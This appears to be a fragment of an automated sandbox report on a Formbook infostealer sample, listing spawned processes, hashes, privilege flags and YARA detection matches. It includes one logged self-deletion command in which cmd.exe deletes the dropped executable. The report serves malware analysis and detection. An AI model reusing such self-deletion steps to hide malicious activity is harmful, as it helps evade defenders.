• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 08:53:42
Start date: 11/06/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:54:15
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\help.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\help.exe
Imagebase: 0x13b0000
File size: 10240 bytes
MD5 hash: 09A715036F14D3632AD03B52D1DA6BFF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 08:54:17
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:54:17
Start date: 11/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
